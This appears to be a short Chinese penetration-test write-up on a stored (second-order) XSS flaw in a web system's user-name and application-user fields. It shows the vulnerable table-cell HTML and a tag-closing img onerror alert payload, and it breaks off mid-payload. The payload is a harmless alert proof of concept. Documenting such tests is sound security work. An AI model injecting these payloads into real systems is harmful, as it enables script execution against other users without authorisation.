记一次测试-二次XSS
某系统测试
登录后可以添加用户名称、应用用户等
F12 查看下这两列,是个标签。第一次尝试:对用户名称 aaaa输入处 构造
1<td style="width:96px;display: table-cell;" id="userDisplayName" align="left">aaaaa</td>
构造个标签闭合,用户名称、应用用户分别上传如下
12</td><img src='1' onerror='alert(/1/)'><td></td><img src='1' onerror='alert(/2
...